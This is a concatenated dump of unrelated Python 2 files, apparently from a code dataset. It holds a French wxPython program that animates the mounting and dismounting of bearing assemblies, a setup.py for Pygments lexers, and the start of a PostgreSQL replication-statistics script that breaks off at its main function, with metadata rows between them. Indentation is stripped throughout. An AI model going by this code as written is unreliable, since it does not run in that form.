if (palier == "G" and sens == 0) \
or (palier == "D" and sens == 1):
for tr in ["AGD"+radiale,
"ADG"+radiale,
"ADG"+radopp,
"AGD"+radopp]:
if tr in lstElemFixes:
lst.append(tr)
# print " ... elem à démonter ? =",lst
# for tr in ["J"+palier+"-Ar",
# "J"+palier+"-Al"]:
# if tr in lstElemFixes:
# lst.append(tr)
# On finalise la liste des éléments à démonter
lst2 = []
for c in lst:
## print "tag",c," : ",frameMtg.gettags(c)
pasDejaDemonte = not c in lstElemLibres
## print "pas deja demonte =",pasDejaDemonte,frameMtg.gettags(c)
pasAEnlever = not (c in self.lstArretsAEnleverRlt[palier][sens])
## print "pas à enlever =",pasAEnlever
if (pasDejaDemonte or c == "R"+palier+"---" ) and (pasAEnlever or c[0] == "R"): #and frameMtg.gettags(c) <> () \
lst2.append(c)
# On met les tags ... sans les épaulements
for i in zoneMtg.lstItemMtg:
for t in lst2:
if t in i.tag and not TAG_ARBRE in i.tag and not TAG_ALESAGE in i.tag:
lstItemAnim.append(i)
# # On enlève les épaulements
# frameMtg.dtag(TAG_ARBRE,tag)
# frameMtg.dtag(TAG_ALESAGE,tag)
## if self.cdcf.bagueTournante <> u"Extérieure":
## for t in self.lstArretsAEnleverRlt[sens]:
## frameMtg.addtag_withtag(tag,t)
## print " ... elem à démonter =",lst2
# print "Roulement",palier,"sens",sens
# print " ... elem à démonter =",lst2
# print " ... item à démonter =",lstItemAnim
return lstItemAnim
############################################################
def animerMontageDemontage(self, zoneMtg, tag, remonter, instant = False):
""" Animation du Montage/Démontage
"""
def animer():
# Durée (en seconde)
duree = globdef.DUREE_ANIMATION_MONTAGE
# Calcul du nombre de positions (à 20 img/s)
nbPos = duree * globdef.FRAME_RATE
# Paramètre de la fonction x(t) = ax²
a = 1.0*sensdep*dist/nbPos**2
oldx = 0
for c in range(nbPos):
tm = time.clock()
x = int(round(a*(c-n*nbPos)**2))
if x <> oldx:
for i in lstItemAnim:
i.pos = (i.x + x, i.pos[1])
oldx = x
zoneMtg.Redessiner()
dt = 1.0/globdef.FRAME_RATE - time.clock() + tm
if dt > 0:
time.sleep(dt)
# if remonter: t = "Démontage"
# else : t = "Montage"
# print
# print " Animation ",tag
wx.BeginBusyCursor()
# def GroupeBmp(lstItem):
# # Regroupement des images
# bmp = wx.EmptyBitmap(zoneMtg.maxWidth, zoneMtg.maxHeight)
# memdc = wx.MemoryDC(bmp)
# memdc.SetBackground(wx.Brush(wx.Colour(255,255,254))) #wx.TRANSPARENT_BRUSH)
# memdc.Clear()
# for i in lstItemAnim:
# memdc.DrawBitmap(i.bmp, i.pos[0], i.pos[1], True)
# zoneMtg.hachurer(memdc, self.listeElementsNonArretes[sens])
# memdc.SelectObject(wx.NullBitmap)
# img = wx.ImageFromBitmap(bmp)
# img.SetMaskColour(255,255,254)
# img.SetMask(True)
# bmp = wx.BitmapFromImage(img)
# return bmp
#
# Réglage de la distance (en pixels)
#
if tag[4] == "E":
dist = DISTANCE_DEMONTAGE_ENSEMBLE
else:
if tag[7] == "G" and tag[8] == "0" \
or tag[7] == "D" and tag[8] == "1":
dist = DISTANCE_DEMONTAGE_RLT_LONG
else:
dist = DISTANCE_DEMONTAGE_RLT_COURT
#
# On établi la liste des item à animer
#
sens = eval(tag[8])
if tag[4] == "E":
lstItemAnim = self.listeItemLibres[sens]
else:
lstItemAnim = self.ListeItemRoult[tag[7]][sens]
# print " ... elem à démonter =",self.listeElemAlesage[sens]
# print " ... item à démonter =",lstItemAnim
#
# Lancement de l'animation
#=========================
#
# signe du sens de déplacement ##############################
if not remonter:
sgn = 1
else:
sgn = -1
# sens du déplacement (demontage) ##############################
# ( 1 = vers la droite
# -1 = vers la gauche )
sensdep = 1 - eval(tag[8]) * 2
if remonter:
n = 1
else:
n = 0
# On ote les arrêt à enlever
if tag[4] == "E":
objet = "E"
else:
objet = tag[7]
if not remonter:
self.afficher_cacherArretsAEnlever(zoneMtg, sens, objet, remonter, instant)
# Sauvegarde de la position en x
if not remonter:
for i in lstItemAnim:
i.x = i.pos[0]
# Mouvement
if instant:
# print dist*sensdep*sgn
for i in lstItemAnim:
i.pos = (i.pos[0] + dist*sensdep*sgn, i.pos[1])
# zoneMtg.Redessiner()
else:
animer()
# On affiche les arrêt à enlever
if remonter:
self.afficher_cacherArretsAEnlever(zoneMtg, sens, objet, remonter, instant)
wx.EndBusyCursor()
#############################################################################
def initTraceResultats(self, zoneMtg):
self.mobileTrace = None
self.chaineTracee = {0 : None,
1 : None}
self.obstacleTrace = None
# for t in self.chaineTracee.values():
# t = None
# self.mobileTrace = None
# for t in self.obstacleTrace.values():
# t = None
def reinitialiserAffichage(self, zoneMtg):
# print "Réinitialisation affichage analyse"
if self.mobileTrace is not None:
self.tracerSurBrillanceMobiles(zoneMtg, self.mobileTrace, False)
self.initTraceResultats(zoneMtg)
# print self.chaineTracee.values()
zoneMtg.Redessiner(self)
def SetTracerChaine(self, sens, state):
self.chaineTracee[sens] = state
#############################################################################
def tracerResultats(self, dc, zoneMtg):
# print "Tracé résultats analyse",self.chaineTracee.items()
for s,t in self.chaineTracee.items():
if t is not None:
# print " Tracé chaine",s
self.tracerChaineAct(dc, zoneMtg, s)
if self.mobileTrace is not None:
self.tracerFlechesObstacleEnsemble(dc, zoneMtg, self.mobileTrace)
# for obs in self.obstacleTrace.values():
self.tracerObstacle(dc, zoneMtg, self.obstacleTrace)
##############################################################################################
def tracerSurbrillanceArrets(self, zoneMtg, sens, action = True, montrer = True):
""" Met les arrets ne résistant pas en surbrillance
"""
for p in self.lstElemResistePas[sens]:
elem = self.mtg.clefElemPosCode(p)[0]
if action:
elem.item['imag'].couleur("rouge")
try:
elem.item['imagAr'].couleur("rouge")
except:
pass
zoneMtg.SurBrillanceActive = False
else:
elem.item['imag'].normale()
zoneMtg.SurBrillanceActive = True
try:
elem.item['imagAr'].normale()
except:
pass
if montrer :
zoneMtg.Redessiner(self)
###############################################################################
def tracerSurBrillanceMobiles(self, zoneMtg, sens, active = True):
""" Met en surbrillance Bleu et Noir
les ensembles entrant en collision (indémontable)
"""
# print "Surbrillance collision"
# sens = eval(tag[8])
def mettreEnSurbrillance():
for i in self.lstItemAles:
i.couleur("bleu")
for i in self.lstItemArbre:
i.couleur("noir")
def oterSurbrillance():
for i in zoneMtg.lstItemMtg:
i.normale()
# print "SurBrillance mobiles : sens",sens
# print ">>> Eléments serrés :",self.listeElemArbre[sens]
# print ">>> Eléments libres :",self.listeElemAlesage[sens]
self.lstItemArbre = []
self.lstItemAles = []
if self.elemDemonte <> []:
return
listeSerres = self.listeElemArbre[sens]
listeLibres = self.listeElemAlesage[sens]
# Cas des éléments liés à l'alésage
#-----------------------------------
for pcode in self.listeElemAlesage[sens]:
elem,lstclef = self.mtg.clefElemPosCode(pcode)
for clef in lstclef:
self.lstItemAles.append(elem.item[clef])
# Cas des éléments liés à l'arbre
#---------------------------------
for pcode in self.listeElemArbre[sens]:
elem,lstclef = self.mtg.clefElemPosCode(pcode)
for clef in lstclef:
self.lstItemArbre.append(elem.item[clef])
# Cas des morceaux d'arbre ou d'alésage
#--------------------------------------
for i in zoneMtg.lstItemMtg:
# On inclus les éléments d'arbres
if TAG_ARBRE in i.tag:
self.lstItemArbre.append(i)
elif TAG_ALESAGE in i.tag:
self.lstItemAles.append(i)
# Cas des éléments à enlever
#----------------------------
for pcode in self.lstArretsAEnleverEns[sens]:
elem,lstclef = self.mtg.clefElemPosCode(pcode)
for clef in lstclef:
if pcode[3:] == "Ar":
self.lstItemArbre.append(elem.item[clef])
elif pcode[3:] == "Al":
self.lstItemAles.append(elem.item[clef])
# On ote les doublons
#---------------------
# def OterDoublons(liste):
# i = 0
# while i < len(liste):
# if liste[i] in liste[i+1:]:
# liste.pop(i)
# i += 1
# OterDoublons(self.lstItemArbre)
# OterDoublons(self.lstItemAles)
self.lstItemArbre = list(set(self.lstItemArbre))
self.lstItemAles = list(set(self.lstItemAles))
# On cache ou affiche les éléments à démonter (instantanément !)
#-----------------------------------------------------------------
self.afficher_cacherArretsAEnleverEns(zoneMtg, sens, not active, instant = True)
if active:
mettreEnSurbrillance()
else:
oterSurbrillance()
if active:
self.mobileTrace = sens
else:
self.mobileTrace = None
zoneMtg.Redessiner(self)
#############################################################################
def tracerFlechesObstacleEnsemble(self, dc, zoneMtg, sens):
""" Trace des fleches illustrant le sens de collision des ensembles mobiles (indémontable)
"""
def Fleche(long, sens, texte):
""" Fleche avec texte dedans ...
"""
# épaisseur (en pixel)
e = 41
# décalage de l'ombre
o = 4
# Pen de la flèche
pen = wx.Pen(wx.Colour(159,0,0), e)
# pen = wx.Pen("red", e)
pen.SetCap(wx.CAP_BUTT)
# Points extrémités de la Fleche
x1,y1,x2,y2 = 0, e/2, long, e/2
bmp = wx.EmptyBitmap(long+o, e+o)
dc = DCPlus(bmp)
dc.SetBackground(wx.TRANSPARENT_BRUSH)
dc.Clear()
dc.SetBrush(wx.Brush(wx.BLACK))
dc.SetTextForeground(wx.NamedColour('LIGHT GREY'))
dc.SetPen(pen)
dc.DrawLineArrow(x1,y1,x2,y2,
style = 1+(sens+1)/2, tanF = 1)
dc.SetFont(wx.Font(14, wx.DEFAULT, wx.ITALIC, wx.BOLD, False))
lt, ht = dc.GetTextExtent(texte)
if sens == -1:
x1 = x2-lt
dc.DrawText(texte, x1, y1 - ht/2)
dc.SelectObject(wx.NullBitmap)
bmp.SetMask(wx.Mask(bmp))
bmp = Images.ombrer(bmp)
return bmp
if self.cdcf.bagueTournante == "I": s = 1
else: s = -1
dy = 210
for i in [-1, 0, 1]:
sg = (i*i*2-1)*s*(sens * 2 - 1)
bmp = Fleche(160, -sg, " Impossible !! ")
y = zoneMtg.milieuY + i * dy - bmp.GetHeight()/2
x = zoneMtg.milieuX - sg * 150
dc.DrawBitmap(bmp, x, y, True)
#############################################################################
def tracerObstacle(self, dc, zoneMtg, obsTrace):
""" Met en évidence un obstacle au démontage
par une double flèche les éméments en collision
"""
if obsTrace is None:
return
# print u"trace des obstacles :", obsTrace
obs, rad = obsTrace[0], obsTrace[1]
lien = []
# print "Tracé flèche entre :",obs, rad
# print obs[0].posX(), obs[1].posX()
# On met la liste dans l'ordre "D" "G"
if obs[0].posX() > obs[1].posX():
obs.reverse()
lstPosX = [[obs[0],"D"],
[obs[1],"G"]]
# print lstPosX, obs[0].posX(), obs[1].posX()
# Calcul des coordonnées
for posX in lstPosX:
x , y = zoneMtg.coordsBordElem(self.mtg, posX[0], posX[1], rad)
# print x
lien.append((x,zoneMtg.milieuY + y))
#On met tout à la même hauteur ...
def fleche(sens, pt):
# Bout de la Fleche
s = sens*2-1
lf, ef = 10, 5
x,y = pt[0],pt[1]
return [(x,y),(x + s*lf, y+lf), (x + s*lf, y-lf)]
def tracerFleche():
dc.SetPen(wx.Pen(coul, 5))
dc.DrawLines(lien)
dc.SetPen(wx.Pen(coul, 1))
dc.DrawPolygon(fleche(1, lien[len(lien)-1]), fillStyle = wx.WINDING_RULE)
dc.DrawPolygon(fleche(0, lien[0]), fillStyle = wx.WINDING_RULE)
# Tracé de la flêche
if len(lien)>1:
# print lien
# lien[0][1] = (lien[0][1] + lien[1][1]) / 2
# lien[1][1] = lien[0][1]
# if lien[0][0] == lien[1][0]:
# lien[0][0] -= 1
## if cote == "D":
## a = lien[2]
## lien[2] = lien[0]
## lien[0] = a
coul = "red"
tracerFleche()
lien[0] = (lien[0][0], 2 * zoneMtg.milieuY - lien[0][1])
lien[1] = (lien[1][0], 2 * zoneMtg.milieuY - lien[1][1])
tracerFleche()
#############################################################################
def tracerChaineAct(self, dc, zoneMtg, sens):
""" Trace une chaine d'action dans <dc> """
lstLignes = self.chaineAct[sens].lstLignes
def fleche(sens, pt):
# Bout de la Fleche
s = sens*2-1
lf, ef = 10, 5
return [(pt.x - s*4, pt.y),(pt.x + s*lf, pt.y+lf), (pt.x + s*lf, pt.y-lf)]
# Epaisseur en pixel
epaisseur = 4
# Une Couleur différente selon le sens
if sens == 0:
coul = "red"
dc.SetBrush(wx.RED_BRUSH)
else:
coul = "blue"
dc.SetBrush(wx.BLUE_BRUSH)
dc.BeginDrawing()
# Tracé des chaînes
for ligne in lstLignes:
ligneBas = []
# impair = True
# Chaine du bas ...
for p in ligne:
ligneBas.append(wx.Point(p[0],zoneMtg.milieuY - (p[1] - zoneMtg.milieuY)))
# if impair:
# ligneBas .append(c)
# else:
# ligneBas.append()
# impair = not impair
lignes = [ligne,ligneBas]
for l in lignes:
dc.SetPen(wx.Pen(coul, 5))
dc.DrawSpline(l)
dc.SetPen(wx.Pen(coul, 1))
dc.DrawPolygon(fleche(sens, l[len(l)-1]), fillStyle = wx.WINDING_RULE)
dc.EndDrawing()
###################################################################################################################
###################################################################################################################
class ListeActive(wx.Panel):
def __init__(self, parent, listeNom, bouton, actions = None, wrap = 20):
self.coul = wx.NamedColour("PINK")
wx.Panel.__init__(self, parent, -1 )
self.SetBackgroundColour(self.coul)
# box = wx.BoxSizer(wx.VERTICAL)
sizer = wx.GridBagSizer(0,0)
self.parent = parent
self.bouton = bouton
# self.nbObs = len(listeNom['lst'])
StyleText["Gras"].applique(self)
txt = StaticTextWrapped(self, -1, listeNom['mess'])
# txt.Wrap(wrap)
# box.Add(txt, 0, wx.ALIGN_LEFT|wx.ALL, 10)
sizer.Add(txt, (0,0), (1,2), flag = wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM, border = 4)
self.lBox = []
StyleText["Normal"].applique(self)
l = 1
for choix in listeNom['lst']:
box = wx.CheckBox(self, l-1, "")#size = (-1,-1), # 18*len(listeNom['lst'])),
# choices = listChoix,
# style = wx.LB_MULTIPLE|wx.LB_NEEDED_SB)
self.lBox.append(box)
txt = wx.StaticText(self, -1, choix)
# box.Add(self.lb, 0, wx.ALIGN_LEFT|wx.EAST|wx.WEST|wx.SOUTH, 10)
sizer.Add(box, (l,0), flag = wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL|wx.ALL, border = 2)
sizer.Add(txt, (l,1), flag = wx.ALIGN_LEFT|wx.ALIGN_CENTER_VERTICAL|wx.ALL, border = 2)
# self.lb.Fit()
# txt.SetLabel(wordwrap(txt.GetLabel(), lb.GetSize()[0],wx.ClientDC(self)))
# lb.Check(wx.NOT_FOUND)
self.Bind(wx.EVT_CHECKBOX, self.EvtListBox, box)
l += 1
parent.Bind(wx.EVT_SIZE, self.OnSize)
# self.action = action
self.SetSizerAndFit(sizer)
# self.FitInside()
def SymboleDevelop(taille):
bmp = wx.EmptyBitmap(taille, 10)
dc = wx.MemoryDC(bmp)
dc.SetBackground(wx.Brush(wx.Colour(255,255,254))) #wx.TRANSPARENT_BRUSH)
dc.Clear()
dc.SetPen(wx.Pen("PINK", 0))
dc.SetBrush(wx.Brush(self.coul))
poly = ((taille/2, 0),(0,10),(taille,10))
dc.DrawPolygon(poly, fillStyle = wx.WINDING_RULE)
img = wx.ImageFromBitmap(bmp)
img.SetMaskColour(255,255,254)
img.SetMask(True)
bmp = wx.BitmapFromImage(img)
return bmp
self.symboleDevelop = wx.StaticBitmap(parent, -1, SymboleDevelop(bouton.GetSize()[0]))
self.Montrer(False)
###################################################
def OnSize(self, event):
# print "Resize Liste Active",# self.GetSize(),
self.SetSize(wx.Size(self.parent.GetClientSize().GetWidth(),-1))
# print self.GetSize()
event.Skip()
# self.FitInside()
###################################################
def EvtListBox(self, event = None, num = None):
if num is not None: n = num
else: #n = event.GetSelection()
n = event.GetId()
# print n
if hasattr(self.bouton, "typeAction"):
action = self.lBox[n].IsChecked()
if self.bouton.tag[4] <> "R":
surBrill = False
else:
surBrill = True
# print "Obstacle Ensemble :",n, action
self.parent.parent.montrerCollision(self.bouton.lstObs, n,
palier = self.bouton.tag[7],
action = action, surBrill = surBrill)
# print n
###################################################
def Montrer(self, etat):
# print "montrer", self.GetId(),"==>", etat,
if etat:
self.Show()
self.symboleDevelop.Show()
else:
self.Hide()
self.symboleDevelop.Hide()
for lb in self.lBox:
if lb.IsChecked():
lb.SetValue(False)
self.EvtListBox(lb.GetId())
# self.parent.Layout()
self.parent.Refresh()
# self.Update()
# self.parent.Fit()
class StaticTextWrapped(wx.StaticText):
""" A StaticText-like widget which implements word wrapping. """
def __init__(self, *args, **kwargs):
wx.StaticText.__init__(self, *args, **kwargs)
# store the initial label
self.__label = super(StaticTextWrapped, self).GetLabel()
self.marge = 8
# listen for sizing events
self.Bind(wx.EVT_SIZE, self.OnSize)
self.GetParent().Bind(wx.EVT_SIZE, self.OnParentSize)
def SetWrapFact(self, WrapFact):
self.WrapFact = WrapFact
def SetLabel(self, newLabel):
"""Store the new label and recalculate the wrapped version."""
self.__label = newLabel
self.__wrap()
def GetLabel(self):
"""Returns the label (unwrapped)."""
return self.__label
def __wrap(self):
"""Wraps the words in label."""
words = self.__label.split()
lines = []
# get the maximum width (that of our parent)
max_width = self.GetParent().GetVirtualSizeTuple()[0]-self.marge
# On applique un facteur pour le cas ou il y a plusieurs colonnes de texte
if hasattr(self, "WrapFact"):
max_width = max_width/self.WrapFact
index = 0
current = []
for word in words:
current.append(word)
if self.GetTextExtent(" ".join(current))[0] > max_width:
del current[-1]
lines.append(" ".join(current))
current = [word]
# pick up the last line of text
lines.append(" ".join(current))
# set the actual label property to the wrapped version
super(StaticTextWrapped, self).SetLabel("\n".join(lines))
# refresh the widget
# self.Update()
self.Refresh()
def OnSize(self, event):
# dispatch to the wrap method which will
# determine if any changes are needed
self.__wrap()
def OnParentSize(self, event):
txt = self.__label[:6]+"..."+self.__label[-6:]
# print txt.encode('cp437','replace'),
self.__wrap()
# w,h = self.GetParent().GetClientSize()
# w += -8
# self.SetSize((w,h))#self.GetSize()[1]))
# print self.GetSize()
event.Skip()
#class StaticTextWrapped(wx.StaticText):
# def __init__(self, *arg , **kwarg):
# wx.StaticText.__init__(self, *arg , **kwarg)
## self.parent = self.GetParent()
# self.orgtxt = self.GetLabel()
# self.orgSiz = self.GetSize()[0]
# self.GetParent().Bind(wx.EVT_SIZE, self.OnSize)
#
# def OnSize(self, event = None):
## print "Resize StaticTextWraped",self.GetId(), "\t"
# sz = self.GetParent().GetClientSize()[0]-8
## sz = event.GetEventObject().GetSize()[0]
# self.SetLabel(self.orgtxt)
## self.SetLabel(self.GetLabel().replace('\n',' '))
## print "taille textwrapped", sz
# if sz < self.GetSize()[0]:
# self.Wrap(sz)
# self.Update()
## print self.GetLabel().encode('cp437','replace'), self.GetSize()
# self.GetParent().Refresh()
# self.GetParent().Update()
# self.GetParent().Update()
# self.GetParent().Refresh()
# event.Skip()
class SchemaStructure():
def __init__(self):
self.liaisons = {"G" : None,
"D" : None}
def determiner(self, mtg, ddlSupprimes):
# Degrés de liberte supprimés par chacuns des paliers
# 0 : aucuns
# 1 : x+
# 2 : x-
# 4 : y
# 8 : n (rotation /z)
# print "Determination de la structure", ddlSupprimes
#
# Associe des laisons normalisées à chaque palier
#
for cote, ddlSuppr in ddlSupprimes.items():
if ddlSuppr & 8 == 8:
if ddlSuppr & 1 == 1 or ddlSuppr & 2 == 2:
self.liaisons[cote] = "Pivot"
else:
self.liaisons[cote] = "PivotGliss"
elif ddlSuppr & 4 == 4:
if ddlSuppr & 1 == 1 and ddlSuppr & 2 == 2:
self.liaisons[cote] = "Rotule_"
elif ddlSuppr & 1 == 1:
self.liaisons[cote] = "RotuleG"
elif ddlSuppr & 2 == 2:
self.liaisons[cote] = "RotuleD"
else:
self.liaisons[cote] = "LinAnn"
else:
if ddlSuppr & 1 == 1 and ddlSuppr & 2 == 2:
self.liaisons[cote] = "AppPlan_"
elif ddlSuppr & 1 == 1:
self.liaisons[cote] = "AppPlanG"
elif ddlSuppr & 2 == 2:
self.liaisons[cote] = "AppPlanD"
else:
self.liaisons[cote] = "Aucune"
# print " ",self.liaisons
def panel(self, parent):
pnl = wx.Panel(parent, -1)
return pnl
def bitmap(self, charges = None):
# print "Charges :", charges
Ycentres = 30
Xcentres = {"G" : 50,
"D" : 150}
couleurBati = wx.NamedColour("GOLD")
couleurArbr = wx.BLUE
couleurOk = wx.NamedColour("FOREST GREEN")
couleurNo = wx.RED
epaiss = 3
epaisCharg = 17
penBati = wx.Pen(couleurBati, epaiss)
penArbr = wx.Pen(couleurArbr, epaiss)
penOk = wx.Pen(couleurOk, epaisCharg)
penNo = wx.Pen(couleurNo, epaisCharg)
penOk.SetCap(wx.CAP_BUTT)
penNo.SetCap(wx.CAP_BUTT)
# penOk = wx.Pen(couleurOk, 1)
# penNo = wx.Pen(couleurNo, 1)
DimLiaison = 10
def dessinerBati(dc, cote, decaler = 0):
dc.SetPen(penBati)
if cote == "G":
s = -1
else:
s = 1
dc.DrawLine(Xcentres[cote]+s*decaler*DimLiaison*2, Ycentres+DimLiaison*2-decaler*DimLiaison*2,
Xcentres[cote]+s*decaler*DimLiaison*2, Ycentres+DimLiaison*4)
dc.DrawLine(Xcentres[cote]-DimLiaison*2+s*decaler*DimLiaison*2, Ycentres+DimLiaison*4,
Xcentres[cote]+DimLiaison*2+s*decaler*DimLiaison*2, Ycentres+DimLiaison*4)
if decaler <> 0:
dc.DrawLine(Xcentres[cote]+s*decaler*DimLiaison*2, Ycentres,
Xcentres[cote]+s*decaler*DimLiaison/2, Ycentres)
for i in range(5):
dc.DrawLine(Xcentres[cote]-DimLiaison*2+i*DimLiaison+s*decaler*DimLiaison*2, Ycentres+DimLiaison*4,
Xcentres[cote]-DimLiaison*2+(i+1)*DimLiaison+s*decaler*DimLiaison*2, Ycentres+DimLiaison*5)
def dessinerArbr(dc, liaisons = None):
dc.SetPen(penArbr)
decal = [0,0]
if liaisons is not None:
for s in [0,1]:
if liaisons[s] == "AppPlan" or liaisons[s][:-1] == "AppPlan":
decal[s] = (1-2*s) * DimLiaison/2
elif liaisons[s] == "Pivot" or liaisons[s] == "PivotGliss":
decal[s] = (1-2*s) * DimLiaison*5
dc.DrawLine(Xcentres["G"]+DimLiaison+decal[1], Ycentres,
Xcentres["D"]-DimLiaison+decal[0], Ycentres)
def dessinerLiaison(dc, liaison, cote):
if liaison[:-1] == "AppPlan":
if cote == "G":
penB, penA = penBati, penArbr
else:
penA, penB = penBati, penArbr
dc.SetPen(penB)
dc.DrawLine(Xcentres[cote]-DimLiaison/2, Ycentres-DimLiaison*2,
Xcentres[cote]-DimLiaison/2, Ycentres+DimLiaison*2)
dc.SetPen(penA)
dc.DrawLine(Xcentres[cote]+DimLiaison/2, Ycentres-DimLiaison*2,
Xcentres[cote]+DimLiaison/2, Ycentres+DimLiaison*2)
elif liaison[:-1] == "Rotule" or liaison == "LinAnn":
dc.SetPen(penBati)
dc.SetBrush(wx.TRANSPARENT_BRUSH)
if liaison[-1:] == "G":
dc.DrawArc(Xcentres[cote], Ycentres+DimLiaison*2,
Xcentres[cote], Ycentres-DimLiaison*2,
Xcentres[cote], Ycentres)
elif liaison[-1:] == "D":
dc.DrawArc(Xcentres[cote], Ycentres-DimLiaison*2,
Xcentres[cote], Ycentres+DimLiaison*2,
Xcentres[cote], Ycentres)
elif liaison == "LinAnn":
dc.DrawRectangle(Xcentres[cote]-DimLiaison*2, Ycentres-DimLiaison/4,
DimLiaison*4, DimLiaison*2+DimLiaison/4)
else:
if cote == "G":
s = -1
else:
s = 1
dc.DrawArc(Xcentres[cote]-s*DimLiaison, Ycentres+s*(DimLiaison*7/4),
Xcentres[cote]-s*DimLiaison, Ycentres-s*(DimLiaison*7/4),
Xcentres[cote], Ycentres)
dc.SetBrush(dc.GetBackground())
dc.SetPen(penArbr)
dc.DrawCircle(Xcentres[cote], Ycentres, DimLiaison)
elif liaison == "Pivot" or liaison == "PivotGliss":
dc.SetPen(penBati)
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.DrawRectangle(Xcentres[cote]-DimLiaison*2, Ycentres-DimLiaison*3/2,
DimLiaison*4, DimLiaison*3)
dc.DrawLine(Xcentres[cote], Ycentres+DimLiaison*3/2,
Xcentres[cote], Ycentres+2*DimLiaison)
dc.SetBrush(dc.GetBackground())
dc.SetPen(penArbr)
if liaison == "Pivot":
dc.DrawLine(Xcentres[cote]-DimLiaison*3, Ycentres-DimLiaison,
Xcentres[cote]-DimLiaison*3, Ycentres+DimLiaison)
dc.DrawLine(Xcentres[cote]+DimLiaison*3, Ycentres-DimLiaison,
Xcentres[cote]+DimLiaison*3, Ycentres+DimLiaison)
# dc.SetBrush(wx.TRANSPARENT_BRUSH)
def dessinerFlecheCharge(dc, cote, typeCharge, resiste):
# bm = wx.EmptyBitmap(bmp.GetWidth(), bmp.GetHeight())
# dc = DCPlus(bm)
# dc.Clear()
tanA_ = 1
dc.SetLogicalFunction(wx.AND)
if resiste:
dc.SetPen(penOk)
else:
dc.SetPen(penNo)
if typeCharge == 1:
dc.DrawLineArrow(Xcentres[cote]-DimLiaison*3, Ycentres,
Xcentres[cote]+DimLiaison*3, Ycentres,
style = 2, tanF = tanA_)
elif typeCharge == 2:
dc.DrawLineArrow(Xcentres[cote]-DimLiaison*3, Ycentres,
Xcentres[cote]+DimLiaison*3, Ycentres,
style = 1, tanF = tanA_)
elif typeCharge == 3:
dc.DrawLineArrow(Xcentres[cote]-DimLiaison*3, Ycentres,
Xcentres[cote]+DimLiaison*3, Ycentres,
style = 3, tanF = tanA_)
elif typeCharge == 4:
dc.DrawLineArrow(Xcentres[cote], Ycentres-DimLiaison*3,
Xcentres[cote], Ycentres+DimLiaison*3,
style = 1, tanF = tanA_)
elif typeCharge == 5:
dc.DrawLineArrow(Xcentres[cote]-DimLiaison*2, Ycentres+DimLiaison*2,
Xcentres[cote]+DimLiaison*2, Ycentres-DimLiaison*2,
style = 2, tanF = tanA_)
elif typeCharge == 6:
dc.DrawLineArrow(Xcentres[cote]-DimLiaison*2, Ycentres+DimLiaison*2,
Xcentres[cote]+DimLiaison*2, Ycentres-DimLiaison*2,
style = 1, tanF = tanA_)
elif typeCharge == 7:
dc.DrawLineArrow(Xcentres[cote]-DimLiaison*2, Ycentres+DimLiaison*2,
Xcentres[cote]+DimLiaison*2, Ycentres-DimLiaison*2,
style = 3, tanF = tanA_)
dc.SetLogicalFunction(wx.COPY)
# Regroupement des images
bmp = wx.EmptyBitmap(200, 100)
memdc = DCPlus(bmp)
memdc.SetBackground(wx.Brush(wx.Colour(255,255,254))) #wx.TRANSPARENT_BRUSH)
memdc.Clear()
# memdc.SetBrush(wx.TRANSPARENT_BRUSH)
memdc.SetBrush(memdc.GetBackground())
for cote, l in self.liaisons.items():
if l <> "Aucune":
if l == "AppPlan" or l[:-1] == "AppPlan":
dec = 1
else:
dec = 0
dessinerBati(memdc, cote, dec)
dessinerLiaison(memdc, l, cote)
dessinerArbr(memdc, self.liaisons.values())
for cote, l in self.liaisons.items():
if l <> "Aucune":
if charges is not None:
dessinerFlecheCharge(memdc, cote, charges[cote][0],charges[cote][1])
memdc.SelectObject(wx.NullBitmap)
img = wx.ImageFromBitmap(bmp)
img.SetMaskColour(255,255,254)
img.SetMask(True)
bmp = wx.BitmapFromImage(img)
return bmp
|
gpl-3.0
| -3,650,001,449,097,475,000 | 38.288287 | 150 | 0.456764 | false |
liluo/pygments-github-lexers
|
setup.py
|
1
|
1241
|
#!/usr/bin/python
from setuptools import setup
setup(name='pygments-github-lexers',
version='0.0.5',
description='Pygments Github custom lexers.',
keywords='pygments github lexer',
license='BSD',
author='Liluo',
author_email='i@liluo.org',
url='https://github.com/liluo/pygments-github-lexers',
packages=['pygments_github_lexers'],
install_requires=['pygments>=2.0.2'],
entry_points='''[pygments.lexers]
Dasm16Lexer=pygments_github_lexers:Dasm16Lexer
PuppetLexer=pygments_github_lexers:PuppetLexer
AugeasLexer=pygments_github_lexers:AugeasLexer
TOMLLexer=pygments_github_lexers:TOMLLexer
SlashLexer=pygments_github_lexers:SlashLexer''',
classifiers=[
'Environment :: Plugins',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
],)
|
bsd-2-clause
| 6,308,187,781,502,029,000 | 34.457143 | 73 | 0.596293 | false |
uptimejp/postgres-toolkit
|
postgres_toolkit/pt_replication_stat.py
|
1
|
3712
|
#!/usr/bin/env python
# coding: UTF-8
# pt-replication-stat
#
# Copyright(c) 2015-2018 Uptime Technologies, LLC.
import copy
import getopt
import os
import sys
import time
import PsqlWrapper
import log
class ReplicationStatistics:
def __init__(self, psql, debug=False):
self.debug = debug
self.psql = psql
self.header = None
def get(self):
if self.psql.get_version() == 9.0:
log.error("PostgreSQL 9.0 is not supported.")
sys.exit(1)
pidcol = "pid"
if self.psql.get_version() == 9.1:
pidcol = "procpid"
query = ' \
select null as "PID", \
null as "NAME", \
null as "HOST", \
null as "PORT", \
\'local\' as "STATE", \
pg_current_xlog_insert_location() as "SENT", \
pg_current_xlog_location() as "WRITTTEN", \
null as "FLUSHED", \
null as "REPLAYED", \
null as "PRI", \
\'master\' as "MODE" \
union all \
select %s, \
application_name as name, \
client_addr as addr, \
client_port as port, \
state, \
sent_location as sent, \
write_location as write, \
flush_location as flush, \
replay_location as reply, \
sync_priority as pri, \
sync_state as mode \
from pg_stat_replication \
;' % pidcol
log.debug(query)
rs = p.execute_query(query)
if rs is None or len(rs) == 0:
log.error("Cannot retreive statitics from the server. "
"Connecting to wrong server?")
sys.exit(1)
else:
p.print_result(rs)
print("")
return True
def usage():
print '''
Usage: {0} [option...] [delay [count]]
Options:
-h, --host=HOSTNAME Host name of the postgres server
-p, --port=PORT Port number of the postgres server
-U, --username=USERNAME User name to connect
-d, --dbname=DBNAME Database name to connect
--help Print this help.
'''.format(os.path.basename(sys.argv[0]))
def main():
